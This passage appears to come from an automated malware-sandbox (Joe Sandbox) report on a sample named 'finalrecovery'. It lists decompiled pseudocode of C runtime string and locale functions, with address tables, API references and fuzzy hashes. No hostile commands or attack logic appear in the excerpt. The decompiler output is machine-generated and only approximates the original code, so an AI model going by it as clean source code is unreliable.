																goto L61;
															}
														}
													}
													goto L31;
												}
											} else {
												if(_v28 >= 2) {
													_t80 =  &_v22;
													if(_v22 != 0) {
														while(1) {
															_t96 =  *((intOrPtr*)(_t80 + 1));
															if(_t96 == 0) {
																goto L21;
															}
															_t101 =  *_t102;
															if(_t101 <  *_t80 || _t101 > _t96) {
																_t80 = _t80 + 2;
																if( *_t80 != 0) {
																	continue;
																} else {
																	goto L21;
																}
															} else {
																goto L59;
															}
															goto L22;
														}
													}
												}
												goto L21;
												L22:
												_pop(_t60);
											}
										}
									}
								}
							}
						} else {
							L32:
							_t102 = 0;
							_t65 = E10008CD8(_a32, 9, _v36, _t103, 0, 0);
							_t107 = _t105 + 0x18;
							_v44 = _t65;
							if(_t65 == 0) {
								L60:
								_t60 = 0;
							} else {
								_t101 = _t65 + _t65 + 8;
								asm("sbb eax, eax");
								_t66 = _t65 & _t65 + _t65 + 0x00000008;
								if(_t66 == 0) {
									_t67 = 0;
									_v32 = 0;
									goto L41;
								} else {
									if(_t66 > 0x400) {
										_t77 = E1000797E(_t66);
										_v32 = _t77;
										if(_t77 == 0) {
											goto L57;
										} else {
											 *_t77 = 0xdddd;
											goto L39;
										}
									} else {
										E1000E9A0(_t66);
										_t77 = _t107;
										_v32 = _t77;
										if(_t77 == 0) {
											L57:
											_t85 = _v32;
										} else {
											 *_t77 = 0xcccc;
											L39:
											_t67 = _t77 + 8;
											_v32 = _t67;
											L41:
											if(_t67 == 0) {
												goto L57;
											} else {
												_t103 = _a32;
												_t69 = E10008CD8(_a32, 1, _v36, _a32, _t67, _v44);
												_t108 = _t107 + 0x18;
												if(_t69 == 0) {
													goto L57;
												} else {
													_t70 = E10008CD8(_t103, 9, _v40, _t85, _t102, _t102);
													_t109 = _t108 + 0x18;
													_v36 = _t70;
													if(_t70 == 0) {
														goto L57;
													} else {
														_t101 = _t70 + _t70 + 8;
														asm("sbb eax, eax");
														_t71 = _t70 & _t70 + _t70 + 0x00000008;
														if(_t71 == 0) {
															_t103 = _t102;
															goto L52;
														} else {
															if(_t71 > 0x400) {
																_t103 = E1000797E(_t71);
																if(_t103 == 0) {
																	goto L55;
																} else {
																	 *_t103 = 0xdddd;
																	goto L50;
																}
															} else {
																E1000E9A0(_t71);
																_t103 = _t109;
																if(_t103 == 0) {
																	L55:
																	_t85 = _v32;
																} else {
																	 *_t103 = 0xcccc;
																	L50:
																	_t103 = _t103 + 8;
																	L52:
																	if(_t103 == 0 || E10008CD8(_a32, 1, _v40, _t85, _t103, _v36) == 0) {
																		goto L55;
																	} else {
																		_t85 = _v32;
																		_t102 = E10007435(_v48, _a12, _v32, _v44, _t103, _v36, _t102, _t102, _t102);
																	}
																}
															}
														}
														E1000A83E(_t103);
													}
												}
											}
										}
									}
								}
								E1000A83E(_t85);
								_t60 = _t102;
							}
						}
					}
				}
				L61:
				return E100026A5(_t60, _t85, _v8 ^ _t104, _t101, _t102, _t103);
			}

0x1000a575
0x1000a57c
0x1000a584
0x1000a587
0x1000a58d
0x1000a590
0x1000a593
0x1000a597
0x1000a59a
0x1000a59f
0x1000a5b4
0x00000000
0x00000000
0x00000000
0x00000000
0x1000a5a1
0x1000a5a9
0x1000a5ab
0x1000a5ba
0x1000a5ba
0x1000a5bf
0x1000a5d1
0x00000000
0x00000000
0x00000000
0x00000000
0x1000a5c1
0x1000a5ca
0x1000a5d7
0x1000a5d7
0x1000a5dc
0x1000a5e3
0x1000a5e6
0x1000a5e6
0x1000a5eb
0x1000a5f7
0x1000a7dd
0x1000a7dd
0x00000000
0x1000a5fd
0x1000a600
0x1000a689
0x1000a68b
0x1000a606
0x1000a609
0x1000a64e
0x1000a64e
0x00000000
0x1000a60b
0x1000a618
0x00000000
0x1000a61e
0x1000a620
0x1000a658
0x00000000
0x1000a65a
0x1000a65e
0x1000a664
0x1000a667
0x1000a669
0x1000a66c
0x1000a66c
0x1000a671
0x00000000
0x00000000
0x1000a673
0x1000a677
0x1000a681
0x1000a687
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x1000a677
0x1000a66c
0x1000a667
0x00000000
0x1000a65e
0x1000a622
0x1000a626
0x1000a62c
0x1000a62f
0x1000a631
0x1000a631
0x1000a636
0x00000000
0x00000000
0x1000a638
0x1000a63c
0x1000a646
0x1000a64c
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x1000a63c
0x1000a631
0x1000a62f
0x00000000
0x1000a650
0x1000a650
0x1000a650
0x1000a620
0x1000a618
0x1000a609
0x1000a600
0x1000a691
0x1000a691
0x1000a691
0x1000a69e
0x1000a6a3
0x1000a6a6
0x1000a6ab
0x1000a7e4
0x1000a7e4
0x1000a6b1
0x1000a6b4
0x1000a6b9
0x1000a6bb
0x1000a6bd
0x1000a700
0x1000a702
0x00000000
0x1000a6bf
0x1000a6c4
0x1000a6e1
0x1000a6e6
0x1000a6ec
0x00000000
0x1000a6f2
0x1000a6f2
0x00000000
0x1000a6f2
0x1000a6c6
0x1000a6c6
0x1000a6cb
0x1000a6cd
0x1000a6d2
0x1000a7cf
0x1000a7cf
0x1000a6d8
0x1000a6d8
0x1000a6f8
0x1000a6f8
0x1000a6fb
0x1000a705
0x1000a707
0x00000000
0x1000a70d
0x1000a715
0x1000a71b
0x1000a720
0x1000a725
0x00000000
0x1000a72b
0x1000a734
0x1000a739
0x1000a73c
0x1000a741
0x00000000
0x1000a747
0x1000a74a
0x1000a74f
0x1000a751
0x1000a753
0x1000a787
0x00000000
0x1000a755
0x1000a75a
0x1000a775
0x1000a77a
0x00000000
0x1000a77c
0x1000a77c
0x00000000
0x1000a77c
0x1000a75c
0x1000a75c
0x1000a761
0x1000a765
0x1000a7c3
0x1000a7c3
0x1000a767
0x1000a767
0x1000a782
0x1000a782
0x1000a789
0x1000a78b
0x00000000
0x1000a7a6
0x1000a7a6
0x1000a7bf
0x1000a7bf
0x1000a78b
0x1000a765
0x1000a75a
0x1000a7c7
0x1000a7cc
0x1000a741
0x1000a725
0x1000a707
0x1000a6d2
0x1000a6c4
0x1000a7d3
0x1000a7d9
0x1000a7d9
0x1000a6ab
0x1000a5eb
0x1000a5bf
0x1000a7e6
0x1000a7f7

APIs

GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,1000A829,00000000,00000000,00000000,00000001,?,?,?,?,00000001), ref: 1000A610
__alloca_probe_16.LIBCMT ref: 1000A6C6
__alloca_probe_16.LIBCMT ref: 1000A75C
__freea.LIBCMT ref: 1000A7C7
__freea.LIBCMT ref: 1000A7D3

Memory Dump Source

Source File: 00000002.00000002.324049743.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.324045427.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.324060416.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.324067694.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_finalrecovery.jbxd

Similarity

API ID: __alloca_probe_16__freea$Info
String ID:
API String ID: 2330168043-0
Opcode ID: 50bd88b5ec7d3217cbe60f9d1e7d4836d51787e23259cfb072370776b80678a8
Instruction ID: 48575c92ac3da1999b9a340075b4421a728e163ba4acd9a709e131659f3629d5
Opcode Fuzzy Hash: 50bd88b5ec7d3217cbe60f9d1e7d4836d51787e23259cfb072370776b80678a8
Instruction Fuzzy Hash: 97819372D042069BFF21CE548C41EDE7BF5EF4A6D0F158259E948A7149D6369D80CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00421182 Relevance: 7.7, APIs: 5, Instructions: 199
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E00421182(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				intOrPtr _v12;
				void* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t41;
				signed int _t49;
				void* _t51;
				signed int _t55;
				intOrPtr _t63;
				intOrPtr _t69;
				void* _t71;
				intOrPtr* _t72;
				intOrPtr _t86;
				void* _t89;
				intOrPtr* _t91;
				intOrPtr _t93;
				void* _t94;
				void* _t95;
				signed int _t96;
				void* _t97;
				intOrPtr* _t98;
				intOrPtr* _t100;
				void* _t103;

				_push(__ecx);
				_push(__ecx);
				_t41 =  *0x43d054; // 0x8e1b5714
				_v8 = _t41 ^ _t96;
				_t93 = _a20;
				if(_t93 > 0) {
					_t69 = E00419C0D(_a16, _t93);
					_t103 = _t69 - _t93;
					_t4 = _t69 + 1; // 0x1
					_t93 = _t4;
					if(_t103 >= 0) {
						_t93 = _t69;
					}
				}
				_t88 = _a32;
				if(_a32 == 0) {
					_t88 =  *((intOrPtr*)( *_a4 + 8));
					_a32 =  *((intOrPtr*)( *_a4 + 8));
				}
				_t86 = E0041FDC8(_t88, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t93, 0, 0);
				_t98 = _t97 + 0x18;
				_v12 = _t86;
				if(_t86 == 0) {
					L39:
					_pop(_t89);
					_pop(_t94);
					_pop(_t71);
					return E0040EB3F(_t46, _t71, _v8 ^ _t96, _t86, _t89, _t94);
				} else {
					_t17 = _t86 + _t86 + 8; // 0x8
					asm("sbb eax, eax");
					_t49 = _t86 + _t86 & _t17;
					if(_t49 == 0) {
						_t72 = 0;
						L15:
						if(_t72 == 0) {
							L37:
							_t95 = 0;
							L38:
							E0040EB21(_t72);
							_t46 = _t95;
							goto L39;
						}
						_t51 = E0041FDC8(_t88, 1, _a16, _t93, _t72, _t86);
						_t100 = _t98 + 0x18;
						if(_t51 == 0) {
							goto L37;
						}
						_t90 = _v12;
						_t95 = E0041E8DE(_a8, _a12, _t72, _v12, 0, 0, 0, 0, 0);
						if(_t95 == 0) {
							goto L37;
						}
						_t86 = 0x400;
						if((_a12 & 0x00000400) == 0) {
							_t31 = _t95 + _t95 + 8; // 0x8
							asm("sbb eax, eax");
							_t55 = _t95 + _t95 & _t31;
							if(_t55 == 0) {
								_t91 = 0;
								L31:
								if(_t91 == 0 || E0041E8DE(_a8, _a12, _t72, _v12, _t91, _t95, 0, 0, 0) == 0) {
									L36:
									E0040EB21(_t91);
									goto L37;
								} else {
									_push(0);
									_push(0);
									if(_a28 != 0) {
										_push(_a28);
										_push(_a24);
									} else {
										_push(0);
										_push(0);
									}
									_push(_t95);
									_push(_t91);
									_push(0);
									_push(_a32);
									_t95 = E00420014();
									if(_t95 != 0) {
										E0040EB21(_t91);
										goto L38;
									} else {
										goto L36;
									}
								}
							}
							if(_t55 > 0x400) {
								_t91 = E0041ECAF(_t55);
								if(_t91 == 0) {
									goto L36;
								}
								 *_t91 = 0xdddd;
								L29:
								_t91 = _t91 + 8;
								goto L31;
							}
							E0040F500(_t55);
							_t91 = _t100;
							if(_t91 == 0) {
								goto L36;
							}
							 *_t91 = 0xcccc;
							goto L29;
						}
						_t63 = _a28;
						if(_t63 == 0) {
							goto L38;
						}
						if(_t95 > _t63) {
							goto L37;
						}
						_t95 = E0041E8DE(_a8, _a12, _t72, _t90, _a24, _t63, 0, 0, 0);
						if(_t95 != 0) {
							goto L38;
						}
						goto L37;
					}
					if(_t49 > 0x400) {
						_t72 = E0041ECAF(_t49);
						if(_t72 == 0) {
							L13:
							_t86 = _v12;
							goto L15;
						}
						 *_t72 = 0xdddd;
						L12:
						_t72 = _t72 + 8;
						goto L13;
					}
					E0040F500(_t49);
					_t72 = _t98;
					if(_t72 == 0) {
						goto L13;
					}
					 *_t72 = 0xcccc;
					goto L12;
				}
			}

0x00421187
0x00421188
0x00421189
0x00421190
0x00421195
0x0042119b
0x004211a1
0x004211a7
0x004211aa
0x004211aa
0x004211ad
0x004211af
0x004211af
0x004211ad
0x004211b1
0x004211b6
0x004211bd
0x004211c0
0x004211c0
0x004211e1
0x004211e3
0x004211e6
0x004211eb
0x00421349
0x0042134c
0x0042134d
0x0042134e
0x0042135a
0x004211f1
0x004211f4
0x004211f9
0x004211fb
0x004211fd
0x00421234
0x00421236
0x00421238
0x0042133e
0x0042133e
0x00421340
0x00421341
0x00421347
0x00000000
0x00421347
0x00421247
0x0042124c
0x00421251
0x00000000
0x00000000
0x00421257
0x0042126e
0x00421272
0x00000000
0x00000000
0x00421278
0x00421280
0x004212bd
0x004212c2
0x004212c4
0x004212c6
0x004212f7
0x004212f9
0x004212fb
0x00421337
0x00421338
0x00000000
0x00421318
0x0042131a
0x0042131b
0x0042131f
0x0042135b
0x0042135e
0x00421321
0x00421321
0x00421322
0x00421322
0x00421323
0x00421324
0x00421325
0x00421326
0x0042132e
0x00421335
0x00421364
0x00000000
0x00000000
0x00000000
0x00000000
0x00421335
0x004212fb
0x004212ca
0x004212e5
0x004212ea
0x00000000
0x00000000
0x004212ec
0x004212f2
0x004212f2
0x00000000
0x004212f2
0x004212cc
0x004212d1
0x004212d5
0x00000000
0x00000000
0x004212d7
0x00000000
0x004212d7
0x00421282
0x00421287
0x00000000
0x00000000
0x0042128f
0x00000000
0x00000000
0x004212ab
0x004212af
0x00000000
0x00000000
0x00000000
0x004212b5
0x00421204
0x0042121f
0x00421224
0x0042122f
0x0042122f
0x00000000
0x0042122f
0x00421226
0x0042122c
0x0042122c
0x00000000
0x0042122c
0x00421206
0x0042120b
0x0042120f
0x00000000
0x00000000
0x00421211
0x00000000
0x00421211

APIs

__alloca_probe_16.LIBCMT ref: 00421206
__alloca_probe_16.LIBCMT ref: 004212CC
__freea.LIBCMT ref: 00421338

Part of subcall function 0041ECAF: RtlAllocateHeap.NTDLL(00000000,?,?,?,0040FF1B,?,?,?,?,?,00403757,?,?,?), ref: 0041ECE1

__freea.LIBCMT ref: 00421341
__freea.LIBCMT ref: 00421364

Memory Dump Source

Source File: 00000002.00000002.323409231.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.323409231.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_finalrecovery.jbxd

Yara matches

Similarity

API ID: __freea$__alloca_probe_16$AllocateHeap
String ID:
API String ID: 1423051803-0
Opcode ID: b8679c75a32fc34e84bc2013dc0e43ac7a71dfed30df53682d7456621a56f83d
Instruction ID: 56130957566ac49bd44274fb22fd8eb40fad29b7ccfae9c055e311d19bdb2949
Opcode Fuzzy Hash: b8679c75a32fc34e84bc2013dc0e43ac7a71dfed30df53682d7456621a56f83d
Instruction Fuzzy Hash: 53512572700126ABEB209F61EC41EFF76AAEF54754F55012AFC04E7260E738DC5186A8

Uniqueness

Uniqueness Score: -1.00%

Function 1000AF47 Relevance: 7.7, APIs: 5, Instructions: 199
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E1000AF47(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				intOrPtr _v12;
				void* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t41;
				signed int _t49;
				void* _t51;
				signed int _t55;
				intOrPtr _t63;
				intOrPtr _t69;
				void* _t71;
				intOrPtr* _t72;
				intOrPtr _t86;
				void* _t89;
				intOrPtr* _t91;
				intOrPtr _t93;
				void* _t94;
				void* _t95;
				signed int _t96;
				void* _t97;
				intOrPtr* _t98;
				intOrPtr* _t100;
				void* _t103;

				_push(__ecx);
				_push(__ecx);
				_t41 =  *0x10017004; // 0xb1cc4d85
				_v8 = _t41 ^ _t96;
				_t93 = _a20;
				if(_t93 > 0) {
					_t69 = E1000C6A1(_a16, _t93);
					_t103 = _t69 - _t93;
					_t4 = _t69 + 1; // 0x1
					_t93 = _t4;
					if(_t103 >= 0) {
						_t93 = _t69;
					}
				}
				_t88 = _a32;
				if(_a32 == 0) {
					_t88 =  *((intOrPtr*)( *_a4 + 8));
					_a32 =  *((intOrPtr*)( *_a4 + 8));
				}
				_t86 = E10008CD8(_t88, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t93, 0, 0);
				_t98 = _t97 + 0x18;
				_v12 = _t86;
				if(_t86 == 0) {
					L39:
					_pop(_t89);
					_pop(_t94);
					_pop(_t71);
					return E100026A5(_t46, _t71, _v8 ^ _t96, _t86, _t89, _t94);
				} else {
					_t17 = _t86 + _t86 + 8; // 0x8
					asm("sbb eax, eax");
					_t49 = _t86 + _t86 & _t17;
					if(_t49 == 0) {
						_t72 = 0;
						L15:
						if(_t72 == 0) {
							L37:
							_t95 = 0;
							L38:
							E1000A83E(_t72);
							_t46 = _t95;
							goto L39;
						}
						_t51 = E10008CD8(_t88, 1, _a16, _t93, _t72, _t86);
						_t100 = _t98 + 0x18;
						if(_t51 == 0) {
							goto L37;
						}
						_t90 = _v12;
						_t95 = E100075DC(_a8, _a12, _t72, _v12, 0, 0, 0, 0, 0);
						if(_t95 == 0) {
							goto L37;
						}
						_t86 = 0x400;
						if((_a12 & 0x00000400) == 0) {
							_t31 = _t95 + _t95 + 8; // 0x8
							asm("sbb eax, eax");
							_t55 = _t95 + _t95 & _t31;
							if(_t55 == 0) {
								_t91 = 0;
								L31:
								if(_t91 == 0 || E100075DC(_a8, _a12, _t72, _v12, _t91, _t95, 0, 0, 0) == 0) {
									L36:
									E1000A83E(_t91);
									goto L37;
								} else {
									_push(0);
									_push(0);
									if(_a28 != 0) {
										_push(_a28);
										_push(_a24);
									} else {
										_push(0);
										_push(0);
									}
									_push(_t95);
									_push(_t91);
									_push(0);
									_push(_a32);
									_t95 = E10008D54();
									if(_t95 != 0) {
										E1000A83E(_t91);
										goto L38;
									} else {
										goto L36;
									}
								}
							}
							if(_t55 > 0x400) {
								_t91 = E1000797E(_t55);
								if(_t91 == 0) {
									goto L36;
								}
								 *_t91 = 0xdddd;
								L29:
								_t91 = _t91 + 8;
								goto L31;
							}
							E1000E9A0(_t55);
							_t91 = _t100;
							if(_t91 == 0) {
								goto L36;
							}
							 *_t91 = 0xcccc;
							goto L29;
						}
						_t63 = _a28;
						if(_t63 == 0) {
							goto L38;
						}
						if(_t95 > _t63) {
							goto L37;
						}
						_t95 = E100075DC(_a8, _a12, _t72, _t90, _a24, _t63, 0, 0, 0);
						if(_t95 != 0) {
							goto L38;
						}
						goto L37;
					}
					if(_t49 > 0x400) {
						_t72 = E1000797E(_t49);
						if(_t72 == 0) {
							L13:
							_t86 = _v12;
							goto L15;
						}
						 *_t72 = 0xdddd;
						L12:
						_t72 = _t72 + 8;
						goto L13;
					}
					E1000E9A0(_t49);
					_t72 = _t98;
					if(_t72 == 0) {
						goto L13;
					}
					 *_t72 = 0xcccc;
					goto L12;
				}
			}

0x1000af4c
0x1000af4d
0x1000af4e
0x1000af55
0x1000af5a
0x1000af60
0x1000af66
0x1000af6c
0x1000af6f
0x1000af6f
0x1000af72
0x1000af74
0x1000af74
0x1000af72
0x1000af76
0x1000af7b
0x1000af82
0x1000af85
0x1000af85
0x1000afa6
0x1000afa8
0x1000afab
0x1000afb0
0x1000b10e
0x1000b111
0x1000b112
0x1000b113
0x1000b11f
0x1000afb6
0x1000afb9
0x1000afbe
0x1000afc0
0x1000afc2
0x1000aff9
0x1000affb
0x1000affd
0x1000b103
0x1000b103
0x1000b105
0x1000b106
0x1000b10c
0x00000000
0x1000b10c
0x1000b00c
0x1000b011
0x1000b016
0x00000000
0x00000000
0x1000b01c
0x1000b033
0x1000b037
0x00000000
0x00000000
0x1000b03d
0x1000b045
0x1000b082
0x1000b087
0x1000b089
0x1000b08b
0x1000b0bc
0x1000b0be
0x1000b0c0
0x1000b0fc
0x1000b0fd
0x00000000
0x1000b0dd
0x1000b0df
0x1000b0e0
0x1000b0e4
0x1000b120
0x1000b123
0x1000b0e6
0x1000b0e6
0x1000b0e7
0x1000b0e7
0x1000b0e8
0x1000b0e9
0x1000b0ea
0x1000b0eb
0x1000b0f3
0x1000b0fa
0x1000b129
0x00000000
0x00000000
0x00000000
0x00000000
0x1000b0fa
0x1000b0c0
0x1000b08f
0x1000b0aa
0x1000b0af
0x00000000
0x00000000
0x1000b0b1
0x1000b0b7
0x1000b0b7
0x00000000
0x1000b0b7
0x1000b091
0x1000b096
0x1000b09a
0x00000000
0x00000000
0x1000b09c
0x00000000
0x1000b09c
0x1000b047
0x1000b04c
0x00000000
0x00000000
0x1000b054
0x00000000
0x00000000
0x1000b070
0x1000b074
0x00000000
0x00000000
0x00000000
0x1000b07a
0x1000afc9
0x1000afe4
0x1000afe9
0x1000aff4
0x1000aff4
0x00000000
0x1000aff4
0x1000afeb
0x1000aff1
0x1000aff1
0x00000000
0x1000aff1
0x1000afcb
0x1000afd0
0x1000afd4
0x00000000
0x00000000
0x1000afd6
0x00000000
0x1000afd6

APIs

__alloca_probe_16.LIBCMT ref: 1000AFCB
__alloca_probe_16.LIBCMT ref: 1000B091
__freea.LIBCMT ref: 1000B0FD

Part of subcall function 1000797E: RtlAllocateHeap.NTDLL(00000000,10001F3C,?,?,100026E9,10001F3C,?,10001F3C,0007A120), ref: 100079B0

__freea.LIBCMT ref: 1000B106
__freea.LIBCMT ref: 1000B129

Memory Dump Source

Source File: 00000002.00000002.324049743.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.324045427.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.324060416.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.324067694.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_finalrecovery.jbxd

Similarity

API ID: __freea$__alloca_probe_16$AllocateHeap
String ID:
API String ID: 1423051803-0
Opcode ID: 62e8ed48b923a589881dae8ff2bf21b480e942a00d0272eaa54439dc614a212a
Instruction ID: e6425b6c8d105bd431202f80254c2bdf2530ed88b240aa741698b4fb6ea43a12
Opcode Fuzzy Hash: 62e8ed48b923a589881dae8ff2bf21b480e942a00d0272eaa54439dc614a212a
Instruction Fuzzy Hash: F551AF72600606AFFB21DF54CC41EBB36E9EF456D0F124229FD14A7158DB74EC9086A1

Uniqueness

Uniqueness Score: -1.00%

Function 0041B9F1 Relevance: 7.7, APIs: 5, Instructions: 186
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 76%

			E0041B9F1(void* __ebx, signed int __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				intOrPtr* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				signed int _v60;
				char _v276;
				short _v278;
				short _v280;
				char _v448;
				signed int _v452;
				short _v454;
				intOrPtr _v456;
				signed int _v460;
				intOrPtr _v464;
				signed int _v468;
				signed int _v472;
				intOrPtr _v512;
				char _v536;
				intOrPtr _v540;
				signed int _v544;
				intOrPtr _v548;
				signed int _v560;
				char _v708;
				signed int _v712;
				short _v714;
				signed int _v716;
				signed int _v720;
				signed int _v724;
				intOrPtr _v728;
				signed int _v732;
				intOrPtr _v736;
				signed int* _v740;
				signed int _v744;
				signed int _v748;
				signed int _v752;
				char _v824;
				char _v1252;
				char _v1268;
				intOrPtr _v1284;
				signed int _v1288;
				intOrPtr _v1324;
				signed int _v1336;
				void* __ebp;
				signed int _t251;
				void* _t254;
				signed int _t257;
				signed int _t259;
				signed int _t265;
				signed int _t266;
				signed int _t267;
				signed int _t268;
				signed int _t269;
				signed int _t270;
				void* _t272;
				signed int _t273;
				signed int _t274;
				signed int _t275;
				signed int _t277;
				signed int _t280;
				signed int _t287;
				signed int _t288;
				signed int _t290;
				signed int _t291;
				intOrPtr _t292;
				signed int _t295;
				signed int _t297;
				signed int _t298;
				signed int _t301;
				signed int _t303;
				signed int _t306;
				signed int _t307;
				signed int _t309;
				signed int _t310;
				signed int _t326;
				signed int _t328;
				signed int _t330;
				signed int _t334;
				void* _t335;
				signed int _t337;
				void* _t338;
				intOrPtr _t339;
				signed int _t343;
				signed int _t344;
				intOrPtr* _t349;
				signed int _t363;
				signed int _t365;
				void* _t366;
				signed int _t367;
				intOrPtr* _t368;
				signed int _t370;
				void* _t371;
				void* _t375;
				signed int _t379;
				intOrPtr* _t380;
				intOrPtr* _t383;
				void* _t386;
				signed int _t387;
				signed int _t390;
				intOrPtr* _t391;
				char* _t398;
				intOrPtr _t402;
				intOrPtr* _t403;
				signed int _t405;
				signed int _t410;
				signed int _t411;
				intOrPtr* _t415;
				intOrPtr* _t416;
				signed int _t425;
				short _t426;
				signed int _t428;
				intOrPtr _t429;
				void* _t430;
				signed int _t432;
				intOrPtr _t433;
				void* _t434;
				signed int _t435;
				signed int _t438;
				intOrPtr _t444;
				signed int _t445;
				void* _t446;
				signed int _t447;
				signed int _t448;
				void* _t450;
				signed int _t452;
				signed int _t454;
				signed int _t457;
				signed int* _t458;
				short _t459;
				signed int _t461;
				signed int _t462;
				void* _t464;
				void* _t465;
				signed int _t466;
				void* _t467;
				void* _t468;
				signed int _t469;
				void* _t471;
				void* _t472;
				signed int _t484;

				_t424 = __edx;
				_push(__ebx);
				_push(__esi);
				_v12 = 1;
				_t363 = E0041ECAF(0x6a6);
				_t250 = 0;
				_pop(_t375);
				if(_t363 == 0) {
					L20:
					return _t250;
				} else {
					_push(__edi);
					 *_t363 = 1;
					_t2 = _t363 + 4; // 0x4
					_t428 = _t2;
					_t444 = _a4;
					 *_t428 = 0;
					_t251 = _t444 + 0x30;
					_push( *_t251);
					_v16 = _t251;
					_push(0x431670);
					_push( *0x4315ac);
					E0041B92D(_t363, _t375, __edx, _t428, _t444, _t428, 0x351, 3);
					_t465 = _t464 + 0x18;
					_v8 = 0x4315ac;
					while(1) {
						L2:
						_t254 = E0042501D(_t428, 0x351, 0x43166c);
						_t466 = _t465 + 0xc;
						if(_t254 != 0) {
							break;
						} else {
							_t8 = _v16 + 0x10; // 0x10
							_t415 = _t8;
							_t343 =  *_v16;
							_v16 = _t415;
							_t416 =  *_t415;
							_v20 = _t416;
							goto L4;
						}
						while(1) {
							L4:
							_t424 =  *_t343;
							if(_t424 !=  *_t416) {
								break;
							}
							if(_t424 == 0) {
								L8:
								_t344 = 0;
							} else {
								_t424 =  *((intOrPtr*)(_t343 + 2));
								if(_t424 !=  *((intOrPtr*)(_t416 + 2))) {
									break;
								} else {
									_t343 = _t343 + 4;
									_t416 = _t416 + 4;
									if(_t424 != 0) {
										continue;
									} else {
										goto L8;
									}
								}
							}
							L10:
							_push(_v20);
							_push(0x431670);
							asm("sbb eax, eax");
							_v12 = _v12 &  !( ~_t344);
							_t349 = _v8 + 0xc;
							_v8 = _t349;
							_push( *_t349);
							E0041B92D(_t363, _t416, _t424, _t428, _t444, _t428, 0x351, 3);
							_t465 = _t466 + 0x18;
							if(_v8 < 0x4315dc) {
								goto L2;
							} else {
								if(_v12 != 0) {
									E0041E238(_t363);
									_t435 = _t428 | 0xffffffff;
									__eflags =  *(_t444 + 0x28);
									if(__eflags != 0) {
										asm("lock xadd [ecx], eax");
										if(__eflags == 0) {
											E0041E238( *(_t444 + 0x28));
										}
									}
									__eflags =  *(_t444 + 0x24);
									if( *(_t444 + 0x24) != 0) {
										asm("lock xadd [eax], edi");
										__eflags = _t435 == 1;
										if(_t435 == 1) {
											E0041E238( *(_t444 + 0x24));
										}
									}
									 *(_t444 + 0x24) = 0;
									 *(_t444 + 0x1c) = 0;
									 *(_t444 + 0x28) = 0;
									 *((intOrPtr*)(_t444 + 0x20)) = 0;
									_t250 =  *((intOrPtr*)(_t444 + 0x40));
								} else {
									_t438 = _t428 | 0xffffffff;
									_t484 =  *(_t444 + 0x28);
									if(_t484 != 0) {
										asm("lock xadd [ecx], eax");
										if(_t484 == 0) {
											E0041E238( *(_t444 + 0x28));
										}
									}
									if( *(_t444 + 0x24) != 0) {
										asm("lock xadd [eax], edi");
										if(_t438 == 1) {
											E0041E238( *(_t444 + 0x24));
										}
									}
									 *(_t444 + 0x24) =  *(_t444 + 0x24) & 0x00000000;
									_t28 = _t363 + 4; // 0x4
									_t250 = _t28;
									 *(_t444 + 0x1c) =  *(_t444 + 0x1c) & 0x00000000;
									 *(_t444 + 0x28) = _t363;
									 *((intOrPtr*)(_t444 + 0x20)) = _t250;
								}
								goto L20;
							}
							goto L134;
						}
						asm("sbb eax, eax");
						_t344 = _t343 | 0x00000001;
						__eflags = _t344;
						goto L10;
					}
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E004134C4();
					asm("int3");
					_t461 = _t466;
					_t467 = _t466 - 0x1d0;
					_t257 =  *0x43d054; // 0x8e1b5714
					_v60 = _t257 ^ _t461;
					_t259 = _v44;
					_push(_t363);
					_push(_t444);
					_t445 = _v40;
					_push(_t428);
					_t429 = _v48;
					_v512 = _t429;
					__eflags = _t259;
					if(_t259 == 0) {
						_v460 = 1;
						_v472 = 0;
						_t365 = 0;
						_v452 = 0;
						__eflags = _t445;
						if(__eflags == 0) {
							L79:
							_t259 = E0041B9F1(_t365, _t424, _t429, _t445, __eflags, _t429);
							goto L80;
						} else {
							__eflags =  *_t445 - 0x4c;
							if( *_t445 != 0x4c) {
								L59:
								_t259 = E0041B567(_t365, _t424, _t429, _t445, _t445,  &_v276, 0x83,  &_v448, 0x55,  &_v468);
								_t468 = _t467 + 0x18;
								__eflags = _t259;
								if(_t259 != 0) {
									_t379 = 0;
									__eflags = 0;
									_t425 = _t429 + 0x20;
									_t447 = 0;
									_v452 = _t425;
